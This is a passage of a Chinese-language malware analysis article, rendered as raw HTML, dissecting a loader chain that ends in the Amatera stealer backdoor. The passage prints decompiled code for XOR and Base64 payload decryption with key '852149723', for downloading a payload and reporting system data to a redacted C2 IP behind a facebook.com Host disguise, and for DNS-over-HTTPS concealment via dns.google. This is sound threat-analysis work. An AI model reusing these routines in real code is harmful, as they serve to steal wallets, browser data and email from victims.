rgb(0, 72, 171);"><span leaf="">uint</span></span><span leaf="">)array2.Length, Share.Typical.Crazy, </span><span style="color: rgb(0, 72, 171);"><span leaf="">out</span></span><span leaf=""> typical))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                result = Marshal.GetLastWin32Error();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            Share.Latter = (Share.Corporation)Marshal.GetDelegateForFunctionPointer((IntPtr)</span><span style="color: rgb(0, 72, 171);"><span leaf="">value</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">typeof</span></span><span leaf="">(Share.Corporation));</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            result = Share.Latter();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">finally</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">* ptr = </span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> result;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></p><p data-line="222" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">Combine函数通过自定义的异或方式对敏感信息解密。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span style="color: rgb(0, 72, 171);"><span leaf="">public</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">static</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[] </span><span style="color: rgb(0, 72, 171);"><span leaf="">Combine</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[] Training, </span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf=""> Scared</span><span leaf="">)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">{</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[] array = </span><span style="color: rgb(0, 72, 171);"><span leaf="">new</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[Training.Length];</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> i = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">; i &lt; Training.Length; i++)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        array[i] = (Training[i] ^ Scared + ((i &gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">) ? array[i - </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">] : </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">));</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> array;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></p><p data-line="237" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">对资源进行解密解压后获取到一段Shellcode代码，该代码为一个PE装载器。</span></p><figure data-line="239" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5879574970484062" data-type="png" data-w="847" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027775" src="https://wechat2rss.xlab.app/img-proxy/?k=d27d4b99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwX9b55mBv74r5qGDgmuo6BiaFmfepfhamUCicMYwibLicjCEjLMia3BDXbQAeSAM0EPibeELobXXdpGmw3WI1T6cm1g6iaeUSiabHz9t9Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="243" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">Shellcode 装载器再一次通过解压+自定义解密出真正的恶意后门载荷。</span></p><figure data-line="245" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6666666666666666" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027778" src="https://wechat2rss.xlab.app/img-proxy/?k=2c065f98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVQpyQIbxqREW6lDicbKfoqCR9nKr0kfnFlYPM5325XFXEk0xZcV6MK3aqUzrTvX80t7Q70t91N52B7QEpwCqCSXic9D2kyH3rVc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="248" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">经分析，恶意后门为Amatera窃密C2工具，该后门具备针对加密钱包、浏览器、IM应用、电子邮件等数据窃取能力。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">fetch_config_set_endpoints</span></span><span leaf="">();         </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【获取C2配置端点】fetch_config_set_endpoints()从C2服务器获取配置信息</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">result = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf=""> *)</span><span style="color: rgb(0, 72, 171);"><span leaf="">fetch_blob_via_endpoint_c</span></span><span leaf="">();</span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【获取初始载荷】fetch_blob_via_endpoint_c()通过endpoint_c从C2服务器下载初始加密载荷（Base64编码）</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">v34 = result;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( result )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">{</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v37 = </span><span style="color: rgb(0, 72, 171);"><span leaf="">deBase64</span></span><span leaf="">(v34, v17);           </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【Base64解码】将Base64编码的载荷解码为二进制数据</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  result = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf=""> *)</span><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43E540</span></span><span leaf="">(v34);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( v37 )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    v26 = </span><span style="color: rgb(0, 72, 171);"><span leaf="">deXor</span></span><span leaf="">(v37, v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">]);         </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【XOR解密】使用XOR密钥&#34;852149723&#34;解密载荷数据</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    result = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf=""> *)</span><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43E540</span></span><span leaf="">(v37);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( v26 )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">report_system</span></span><span leaf="">();                </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【上报系统信息】收集并上报系统信息（OS版本、计算机名、用户名等）到C2服务器</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      result = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf=""> *)</span><span style="color: rgb(0, 72, 171);"><span leaf="">sub_435E40</span></span><span leaf="">(v26);</span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【解析JSON任务列表】解析解密后的JSON数据，提取任务列表和配置信息</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      v54 = result;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( result )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">sub_407360</span></span><span leaf="">(</span><span style="color: rgb(76, 129, 201);"><span leaf="">50</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">);            </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【延迟执行】sub_407360(50, 0)延迟50毫秒</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">...</span></p></code></pre></p><p data-line="274" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">如下代码为Amatera恶意后门C2标志解密函数，C2开启状态下将接收到窃密json配置信息，通过Base64编码的载荷解码后再次使用XOR密钥&#34;852149723&#34;进行二次解密。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">strcpy</span></span><span leaf="">(v4, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;852149723&#34;</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v6 = </span><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43EDC0</span></span><span leaf="">(v4);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v7 = </span><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43E920</span></span><span leaf="">(a3 + </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( !v7 )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> ( i = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">; i &lt; a3; ++i )</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    *(_BYTE *)(i + v7) = v4[i % (v6 + </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">)] ^ *(_BYTE *)(i + a2);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  *(_BYTE *)(a3 + v7) = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">;</span></p></code></pre></p><p data-line="288" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当前C2未返回有效配置，下图为该家族国外厂商分析过程中返回恶意C2流量，解密后为窃密相关配置（EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT | eSentire）：</span></p><figure data-line="290" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.44722222222222224" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027779" src="https://wechat2rss.xlab.app/img-proxy/?k=fc8a674e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUuhnUZlLG0YnvylXy66U8Zt5B8y26JD9yP4Q8eprStPNzTSdibQqISNEIicJKkSAU5khAcAk4pVXOwGebNib9T730ULJZ7M9hwNM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="292" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者使用的Amatera恶意后门C2地址144.124.235[.]xxx，同时使用facebook.com作为Host伪装。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">.rdata</span></span><span leaf="">:</span><span style="color: rgb(76, 129, 201);"><span leaf="">00452098</span></span><span leaf=""> aFacebookCom    db </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;facebook.com&#39;</span></span><span leaf="">,</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">     ; DATA XREF: .data:off_455008↓o</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">.rdata:</span><span style="color: rgb(76, 129, 201);"><span leaf="">00452098</span></span><span leaf="">                                         ; </span><span style="color: rgb(0, 72, 171);"><span leaf="">.data</span></span><span leaf="">:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004569</span></span><span leaf="">B0↓o ...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">.rdata:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004520</span></span><span leaf="">A5                 align </span><span style="color: rgb(76, 129, 201);"><span leaf="">4</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">.rdata:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004520</span></span><span leaf="">A8 a144124235xxx   db </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;144.124.235.xxx&#39;</span></span><span leaf="">,</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">  ; DATA XREF: .data:off_45500C↓o</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">.rdata:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004520</span></span><span leaf="">A8                                         ; </span><span style="color: rgb(0, 72, 171);"><span leaf="">.data</span></span><span leaf="">:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004569</span></span><span leaf="">B4↓o</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">.rdata:</span><span style="color: rgb(76, 129, 201);"><span leaf="">004520</span></span><span leaf="">B8 aClaude         db </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;Claude&#39;</span></span><span leaf="">,</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">           ; DATA XREF: .data:off_4569D0↓o</span></p></code></pre></p><p data-line="303" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">同时此次发现为Amatera 变种，C2通信同时集成了DNS-over-HTTPS（DoH）技术，用于在C2为DoMain场景下实现DNS过程隐藏。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">sub_422FA0</span></span><span leaf="">(v19, </span><span style="color: rgb(76, 129, 201);"><span leaf="">443</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">);                      </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【初始化HTTPS连接】初始化到dns.google:443的HTTPS连接，准备发送DoH请求</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">16</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Content-Type&#34;</span></span><span leaf="">;                     </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【设置HTTP请求头】构建HTTP请求头数组：Content-Type=application/dns-message, Accept=application/dns-message, Host=dns.google, Content-Length=DNS消息长度</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">17</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;application/dns-message&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Content-Type&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;application/dns-message&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">14</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Accept&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">15</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;application/dns-message&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">2</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Accept&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">3</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;application/dns-message&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">12</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Content-Length&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">13</span></span><span leaf="">] = v11;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">4</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Content-Length&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">5</span></span><span leaf="">] = v11;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">10</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Host&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">11</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;dns.google&#34;</span></span><span leaf="">;                       </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【设置Host字段】HTTP Host头设置为&#34;dns.google&#34;，访问Google的DoH服务</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">6</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Host&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">7</span></span><span leaf="">] = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;dns.google&#34;</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">8</span></span><span leaf="">] = v17;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  v17[</span><span style="color: rgb(76, 129, 201);"><span leaf="">9</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">4</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( !</span><span style="color: rgb(0, 72, 171);"><span leaf="">schannel_https_send_http</span></span><span leaf="">(v16, </span><span style="color: rgb(76, 129, 201);"><span leaf="">2</span></span><span leaf="">, (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf="">)</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/dns-query&#34;</span></span><span leaf="">, (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf="">)v17, </span><span style="color: rgb(76, 129, 201);"><span leaf="">4u</span></span><span leaf="">, (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf="">)v9, v24, (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf="">)v12) )</span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【发送DoH请求】</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> ( v13 == </span><span style="color: rgb(76, 129, 201);"><span leaf="">200</span></span><span leaf=""> &amp;&amp; v15 &lt;= </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x200</span></span><span leaf=""> )             </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【检查HTTP响应】验证响应状态码是否为200(成功)且响应体长度不超过512字节</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43EA30</span></span><span leaf="">(v9, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">512</span></span><span leaf="">);                     </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 【清空缓冲区】准备解析DNS响应消息</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">sub_43E9E0</span></span><span leaf="">(v9, v14, v15);                   </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 